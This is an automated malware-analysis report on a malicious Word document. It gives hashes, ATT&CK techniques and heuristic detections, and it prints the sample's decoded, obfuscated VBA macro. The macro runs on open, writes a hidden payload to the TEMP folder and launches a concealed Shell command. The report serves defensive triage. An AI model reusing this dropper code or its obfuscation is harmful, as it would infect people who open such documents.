Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 48918f4acc1f56e5…

MALICIOUS

Office (OLE)

310.0 KB Created: 2016-05-20 07:07:00 Authoring application: Microsoft Office Word First seen: 2018-09-04
MD5: 98247b9ce269937e31021f3f3f23d56e SHA-1: e0c6855be854ee8d3d91c112c16091b07f77fa15 SHA-256: 48918f4acc1f56e56030d866d4c28806f8ffb192e04b08695f7363a3d9b39951
278 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes `Shell()` and `CreateObject()` calls, indicating an attempt to download and execute a second-stage payload. The obfuscated string concatenation within the script suggests an effort to hide the true nature of the payload or its destination. The ClamAV detection of 'Ole2.Macro.Agent' further supports its malicious nature.

Heuristics 10

  • ClamAV: Ole2.Macro.Agent-9858864-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell yTGliyTIasdd, 0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Set hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject")
    Dim EDNjGrlc, ZcErDyNX, FEhugLeu As String
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
      Sub autoopen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
      Set TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") & "\pan" + asjhdbkx + "x", True)
    Dim IawqTVly, nksXxyIO, ydMjOnnA As String
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly
    Attempted x86 opcode disassembly
    0000F49C  41                inc ecx
    0000F49D  41                inc ecx
    0000F49E  41                inc ecx
    0000F49F  41                inc ecx
    0000F4A0  41                inc ecx
    0000F4A1  41                inc ecx
    0000F4A2  41                inc ecx
    0000F4A3  41                inc ecx
    0000F4A4  41                inc ecx
    0000F4A5  41                inc ecx
    0000F4A6  41                inc ecx
    0000F4A7  41                inc ecx
    0000F4A8  41                inc ecx
    0000F4A9  41                inc ecx
    0000F4AA  41                inc ecx
    0000F4AB  41                inc ecx
    0000F4AC  41                inc ecx
    0000F4AD  41                inc ecx
    0000F4AE  41                inc ecx
    0000F4AF  41                inc ecx
    0000F4B0  41                inc ecx
    0000F4B1  41                inc ecx
    0000F4B2  41                inc ecx
    0000F4B3  41                inc ecx
    0000F4B4  41                inc ecx
    0000F4B5  41                inc ecx
    0000F4B6  41                inc ecx
    0000F4B7  41                inc ecx
    0000F4B8  41                inc ecx
    0000F4B9  41                inc ecx
    0000F4BA  41                inc ecx
    0000F4BB  41                inc ecx
    0000F4BC  41                inc ecx
    0000F4BD  41                inc ecx
    0000F4BE  41                inc ecx
    0000F4BF  41                inc ecx
    0000F4C0  41                inc ecx
    0000F4C1  41                inc ecx
    0000F4C2  41                inc ecx
    0000F4C3  41                inc ecx
    0000F4C4  41                inc ecx
    0000F4C5  41                inc ecx
    0000F4C6  41                inc ecx
    0000F4C7  41                inc ecx
    0000F4C8  41                inc ecx
    0000F4C9  41                inc ecx
    0000F4CA  41                inc ecx
    0000F4CB  41                inc ecx
    0000F4CC  41                inc ecx
    0000F4CD  41                inc ecx
    0000F4CE  41                inc ecx
    0000F4CF  41                inc ecx
    0000F4D0  41                inc ecx
    0000F4D1  41                inc ecx
    0000F4D2  41                inc ecx
    0000F4D3  41                inc ecx
    0000F4D4  41                inc ecx
    0000F4D5  41                inc ecx
    0000F4D6  41                inc ecx
    0000F4D7  41                inc ecx
    0000F4D8  41                inc ecx
    0000F4D9  41                inc ecx
    0000F4DA  41                inc ecx
    0000F4DB  41                inc ecx
    0000F4DC  41                inc ecx
    0000F4DD  41                inc ecx
    0000F4DE  41                inc ecx
    0000F4DF  41                inc ecx
    0000F4E0  41                inc ecx
    0000F4E1  41                inc ecx
    0000F4E2  41                inc ecx
    0000F4E3  41                inc ecx
    0000F4E4  41                inc ecx
    0000F4E5  41                inc ecx
    0000F4E6  41                inc ecx
    0000F4E7  41                inc ecx
    0000F4E8  41                inc ecx
    0000F4E9  41                inc ecx
    0000F4EA  41                inc ecx
    0000F4EB  41                inc ecx
    0000F4EC  41                inc ecx
    0000F4ED  41                inc ecx
    0000F4EE  41                inc ecx
    0000F4EF  41                inc ecx
    0000F4F0  41                inc ecx
    0000F4F1  41                inc ecx
    0000F4F2  41                inc ecx
    0000F4F3  41                inc ecx
    0000F4F4  41                inc ecx
    0000F4F5  41                inc ecx
    0000F4F6  41                inc ecx
    0000F4F7  41                inc ecx
    0000F4F8  41                inc ecx
    0000F4F9  41                inc ecx
    0000F4FA  41                inc ecx
    0000F4FB  41                inc ecx
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x41 bytes
    Disassembly
    Attempted x86 opcode disassembly
    0000BACD  41                inc ecx
    0000BACE  41                inc ecx
    0000BACF  41                inc ecx
    0000BAD0  41                inc ecx
    0000BAD1  41                inc ecx
    0000BAD2  41                inc ecx
    0000BAD3  41                inc ecx
    0000BAD4  41                inc ecx
    0000BAD5  41                inc ecx
    0000BAD6  41                inc ecx
    0000BAD7  41                inc ecx
    0000BAD8  41                inc ecx
    0000BAD9  41                inc ecx
    0000BADA  41                inc ecx
    0000BADB  41                inc ecx
    0000BADC  41                inc ecx
    0000BADD  41                inc ecx
    0000BADE  41                inc ecx
    0000BADF  41                inc ecx
    0000BAE0  41                inc ecx
    0000BAE1  41                inc ecx
    0000BAE2  41                inc ecx
    0000BAE3  41                inc ecx
    0000BAE4  41                inc ecx
    0000BAE5  41                inc ecx
    0000BAE6  41                inc ecx
    0000BAE7  41                inc ecx
    0000BAE8  41                inc ecx
    0000BAE9  41                inc ecx
    0000BAEA  41                inc ecx
    0000BAEB  41                inc ecx
    0000BAEC  41                inc ecx
    0000BAED  41                inc ecx
    0000BAEE  41                inc ecx
    0000BAEF  41                inc ecx
    0000BAF0  41                inc ecx
    0000BAF1  41                inc ecx
    0000BAF2  41                inc ecx
    0000BAF3  41                inc ecx
    0000BAF4  41                inc ecx
    0000BAF5  41                inc ecx
    0000BAF6  41                inc ecx
    0000BAF7  41                inc ecx
    0000BAF8  41                inc ecx
    0000BAF9  41                inc ecx
    0000BAFA  41                inc ecx
    0000BAFB  41                inc ecx
    0000BAFC  51                push ecx
    0000BAFD  41                inc ecx
    0000BAFE  41                inc ecx
    0000BAFF  41                inc ecx
    0000BB00  41                inc ecx
    0000BB01  46                inc esi
    0000BB02  42                inc edx
    0000BB03  46                inc esi
    0000BB04  41                inc ecx
    0000BB05  41                inc ecx
    0000BB06  42                inc edx
    0000BB07  4d                dec ebp
    0000BB08  41                inc ecx
    0000BB09  52                push edx
    0000BB0A  41                inc ecx
    0000BB0B  41                inc ecx
    0000BB0C  56                push esi
    0000BB0D  7745              ja 0xbb54
    0000BB0F  42                inc edx
    0000BB10  41                inc ecx
    0000BB11  41                inc ecx
    0000BB12  41                inc ecx
    0000BB13  4d                dec ebp
    0000BB14  41                inc ecx
    0000BB15  6741              inc ecx
    0000BB17  6f                outsd dx, dword ptr [esi]
    0000BB18  41                inc ecx
    0000BB19  51                push ecx
    0000BB1A  41                inc ecx
    0000BB1B  41                inc ecx
    0000BB1C  3441              xor al, 0x41
    0000BB1E  41                inc ecx
    0000BB1F  48                dec eax
    0000BB20  41                inc ecx
    0000BB21  7773              ja 0xbb96
    0000BB23  42                inc edx
    0000BB24  41                inc ecx
    0000BB25  677741            ja 0xbb69
    0000BB28  6b414141          imul eax, dword ptr [ecx + 0x41], 0x41
    0000BB2C  67                .byte 0x67
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8069 bytes
SHA-256: 95080f497ed431cd6cf3421042b5e990fab8dd47be690f20a4e4c405d4f21764
Detection
ClamAV: No threats found
Obfuscation or payload: likely
153 of 219 identifiers look randomly generated (e.g. 'hgKjhasdjDDD11') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
  Sub autoopen()

  Dim hgJBsdasdDD, TDYFUGasdDc
Dim PZOTcVvh, IddlwNtF, MlBwVFiB As String
Dim PWkSOXRl, TXZVrazm, ACSpvtbw As String
PWkSOXRl = "           VSQVOK               "
TXZVrazm = LTrim(PWkSOXRl)
ACSpvtbw = RTrim(TXZVrazm)

PZOTcVvh = "           HBYBNA               "
Dim iRrAyvqN, NWWdCTnE, TJZUpakw As String
iRrAyvqN = "           KYKFBV               "
NWWdCTnE = LTrim(iRrAyvqN)
TJZUpakw = RTrim(NWWdCTnE)

IddlwNtF = LTrim(PZOTcVvh)
Dim vNRhWiWu, aqKpRTRA, haVDPjHp As String
vNRhWiWu = "           OLLRCU               "
aqKpRTRA = LTrim(vNRhWiWu)
haVDPjHp = RTrim(aqKpRTRA)

MlBwVFiB = RTrim(IddlwNtF)

Dim gAzpgkkf, nUFdJywv, SDnhlLvO As String
gAzpgkkf = "           TBGFWQ               "
nUFdJywv = LTrim(gAzpgkkf)
SDnhlLvO = RTrim(nUFdJywv)

  yTGliyTIasdd = iyUGBKJdasddd.hgKjhasdjDDD1 + iyUGBKJdasddd.hgKjhasdjDDD2 + iyUGBKJdasddd.hgKjhasdjDDD3 + iyUGBKJdasddd.hgKjhasdjDDD4 + iyUGBKJdasddd.hgKjhasdjDDD5 + iyUGBKJdasddd.hgKjhasdjDDD6 + iyUGBKJdasddd.hgKjhasdjDDD7 + iyUGBKJdasddd.hgKjhasdjDDD8 + iyUGBKJdasddd.hgKjhasdjDDD9 + iyUGBKJdasddd.hgKjhasdjDDD10
Dim lWwvOhlk, gWTPrlHl, pXGXvvfm As String
Dim zlChhEUG, CmiAPUtH, LwkDtSZK As String
zlChhEUG = "           UVADNI               "
CmiAPUtH = LTrim(zlChhEUG)
LwkDtSZK = RTrim(CmiAPUtH)

lWwvOhlk = "           HQDJOA               "
Dim AFeYjrxM, uOQaEvgQ, SRlwHLyE As String
AFeYjrxM = "           ZQKHRD               "
uOQaEvgQ = LTrim(AFeYjrxM)
SRlwHLyE = RTrim(uOQaEvgQ)

gWTPrlHl = LTrim(lWwvOhlk)
Dim BbYiBYtl, dhQSrkjz, GnNYDGNw As String
BbYiBYtl = "           GWHKPN               "
dhQSrkjz = LTrim(BbYiBYtl)
GnNYDGNw = RTrim(dhQSrkjz)

pXGXvvfm = RTrim(gWTPrlHl)

Dim LAgscEzT, tUagBktH, jDDkntia As String
LAgscEzT = "           APNCFP               "
tUagBktH = LTrim(LAgscEzT)
jDDkntia = RTrim(tUagBktH)

    yufGHJ = "iptin"
Dim TGIqKzki, qQhTtcpN, HYVakKaJ As String
Dim ItEKzSbR, RtDrxJCY, byChJWmU As String
ItEKzSbR = "           VHJALD               "
RtDrxJCY = LTrim(ItEKzSbR)
byChJWmU = RTrim(RtDrxJCY)

TGIqKzki = "           CAEVZM               "
Dim gGSXWydz, LPlkoAtM, vTaSwXXQ As String
gGSXWydz = "           GATHRX               "
LPlkoAtM = LTrim(gGSXWydz)
vTaSwXXQ = RTrim(LPlkoAtM)

qQhTtcpN = LTrim(TGIqKzki)
Dim FqUBuYrB, eaDEdkhU, TszcXGBa As String
FqUBuYrB = "           PFJDFN               "
eaDEdkhU = LTrim(FqUBuYrB)
TszcXGBa = RTrim(eaDEdkhU)

HYVakKaJ = RTrim(qQhTtcpN)

Dim ZVetOHBt, nOYKUKTE, SGlWoYIF As String
ZVetOHBt = "           SPGSTC               "
nOYKUKTE = LTrim(ZVetOHBt)
SGlWoYIF = RTrim(nOYKUKTE)

  gUYbjk = "stemOb"
Dim SwOXlWmc, asFbvYYy, Ecelirhn As String
Dim YHeMMLST, ZJdyfCpY, cJxkIzUI As String
YHeMMLST = "           COEZGH               "
ZJdyfCpY = LTrim(YHeMMLST)
cJxkIzUI = RTrim(ZJdyfCpY)

SwOXlWmc = "           OMJSLI               "
Dim twyxzlNO, CSXiLngd, ZIRZyXut As String
twyxzlNO = "           JZLQCW               "
CSXiLngd = LTrim(twyxzlNO)
ZIRZyXut = RTrim(CSXiLngd)

asFbvYYy = LTrim(SwOXlWmc)
Dim YZmNKJBt, oDOMAgIv, cEGcYNMu As String
YZmNKJBt = "           DUGXWB               "
oDOMAgIv = LTrim(YZmNKJBt)
cEGcYNMu = RTrim(oDOMAgIv)

Ecelirhn = RTrim(asFbvYYy)

Dim QmlCnQnl, OyXOvDuL, WsISanpe As String
QmlCnQnl = "           JXCIAM               "
OyXOvDuL = LTrim(QmlCnQnl)
WsISanpe = RTrim(OyXOvDuL)

  Set hgJBsdasdDD = CreateObject("Scr" + yufGHJ + "g.FileSy" + gUYbjk + "ject")
Dim EDNjGrlc, ZcErDyNX, FEhugLeu As String
Dim UoqfFTUX, EpmboPtV, vpRQEFZB As String
UoqfFTUX = "           CKUSSP               "
EpmboPtV = LTrim(UoqfFTUX)
vpRQEFZB = RTrim(EpmboPtV)

EDNjGrlc = "           DTFKOR               "
Dim xMGYtHAp, aGczkqlz, YPtxRYpL As String
xMGYtHAp = "           NFQJVU               "
aGczkqlz = LTrim(xMGYtHAp)
YPtxRYpL = RTrim(aGczkqlz)

ZcErDyNX = LTrim(EDNjGrlc)
Dim gtUazCyF, EWSTuIkx, yuabHyaH As String
gtUazCyF = "           CQHFQO               "
EWSTuIkx = LTrim(gtUazCyF)
yuabHyaH = RTrim(EWSTuIkx)

FEhugLeu = RTrim(ZcErDyNX)

Dim peUDviJz, wolHNXMd, lLCZVVnS As String
peUDviJz = "           EDTENY               "
wolHNXMd = LTrim(peUDviJz)
lLCZVVnS = RTrim(wolHNXMd)

  asjhdbkx = "da.pf"
Dim lwGCMgsK, fxBpflOL, pcowIcuW As String
Dim AlRDCDJX, clFBjKgC, llVqQXSV As String
AlRDCDJX = "           MCJVHD               "
clFBjKgC = LTrim(AlRDCDJX)
llVqQXSV = RTrim(clFBjKgC)

lwGCMgsK = "           HBCRGA               "
Dim TlLlYZLy, pgnDLCPV, GpoiykZG As String
TlLlYZLy = "           CHIZCY               "
pgnDLCPV = LTrim(TlLlYZLy)
GpoiykZG = RTrim(pgnDLCPV)

fxBpflOL = LTrim(lwGCMgsK)
Dim hnRqKHVj, KQLtAfUQ, uABOUBLl As String
hnRqKHVj = "           TYMAWV               "
KQLtAfUQ = LTrim(hnRqKHVj)
uABOUBLl = RTrim(KQLtAfUQ)

pcowIcuW = RTrim(fxBpflOL)

Dim HFuDZdro, eMLHrail, gNTLTGqE As String
HFuDZdro = "           LYKEZI               "
eMLHrail = LTrim(HFuDZdro)
gNTLTGqE = RTrim(eMLHrail)

  Set TDYFUGasdDc = hgJBsdasdDD.CreateTextFile(Environ("TEMP") & "\pan" + asjhdbkx + "x", True)
Dim IawqTVly, nksXxyIO, ydMjOnnA As String
Dim pVYReBWK, tBHHxrlL, aBNeJoHM As String
pVYReBWK = "           QDKMLL               "
tBHHxrlL = LTrim(pVYReBWK)
aBNeJoHM = RTrim(tBHHxrlL)

IawqTVly = "           YJAYQQ               "
Dim GIGOXlOg, mExroFnu, fMfGNWGP As String
GIGOXlOg = "           OIQKLW               "
mExroFnu = LTrim(GIGOXlOg)
fMfGNWGP = RTrim(mExroFnu)

nksXxyIO = LTrim(IawqTVly)
Dim thsOLeKw, lykdBFrr, WjTuIsDc As String
thsOLeKw = "           KJYTUS               "
lykdBFrr = LTrim(thsOLeKw)
WjTuIsDc = RTrim(lykdBFrr)

ydMjOnnA = RTrim(nksXxyIO)

Dim MLvcCrto, yNqnvJil, kyCENTsR As String
MLvcCrto = "           WINWSR               "
yNqnvJil = LTrim(MLvcCrto)
kyCENTsR = RTrim(yNqnvJil)

  TDYFUGasdDc.Write (iyUGBKJdasddd.hgKjhasdjDDD11)
Dim tDVDfnzT, lZrjldff, XFkqePCU As String
Dim tBJDSVcb, DRKIEhcG, IRzMCmWH As String
tBJDSVcb = "           ZELHXB               "
DRKIEhcG = LTrim(tBJDSVcb)
IRzMCmWH = RTrim(DRKIEhcG)

tDVDfnzT = "           KZBUJV               "
Dim tmsXeXYa, OjLjhkcK, gsAQZShP As String
tmsXeXYa = "           JAXVCP               "
OjLjhkcK = LTrim(tmsXeXYa)
gsAQZShP = RTrim(OjLjhkcK)

lZrjldff = LTrim(tDVDfnzT)
Dim ojLyNKnL, QZuNOhpd, NldEGawW As String
ojLyNKnL = "           MJXJPY               "
QZuNOhpd = LTrim(ojLyNKnL)
NldEGawW = RTrim(QZuNOhpd)

XFkqePCU = RTrim(lZrjldff)

Dim TzbgrpYc, JiskTVOU, rfVmiQDK As String
TzbgrpYc = "           WCTBTN               "
JiskTVOU = LTrim(TzbgrpYc)
rfVmiQDK = RTrim(JiskTVOU)

  TDYFUGasdDc.Close
Dim emlXEZBV, atXIARTx, dsIQrlIU As String
Dim TweGLhOb, Axfaflun, xccdIvRA As String
TweGLhOb = "           XBRBFA               "
Axfaflun = LTrim(TweGLhOb)
xccdIvRA = RTrim(Axfaflun)

emlXEZBV = "           BXCUEH               "
Dim WCNGkVvp, nLIpRlhz, yFhRJDiM As String
WCNGkVvp = "           TTSDGJ               "
nLIpRlhz = LTrim(WCNGkVvp)
yFhRJDiM = RTrim(nLIpRlhz)

atXIARTx = LTrim(emlXEZBV)
Dim uaAwOZIe, OsHhlNkx, VzWLcSEt As String
uaAwOZIe = "           NMKUJK               "
OsHhlNkx = LTrim(uaAwOZIe)
VzWLcSEt = RTrim(OsHhlNkx)

dsIQrlIU = RTrim(atXIARTx)

Dim TTQxGzTx, EjfpDrqW, GxNdgKgy As String
TTQxGzTx = "           FAYWIE               "
EjfpDrqW = LTrim(TTQxGzTx)
GxNdgKgy = RTrim(EjfpDrqW)

  Shell yTGliyTIasdd, 0

  End Sub





Attribute VB_Name = "iyUGBKJdasddd"
Attribute VB_Base = "0{66AB4D45-849F-4A75-A347-FBE52CBB66D5}{0584011C-B1B1-4DB6-94FE-EDBE2FAFDE09}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False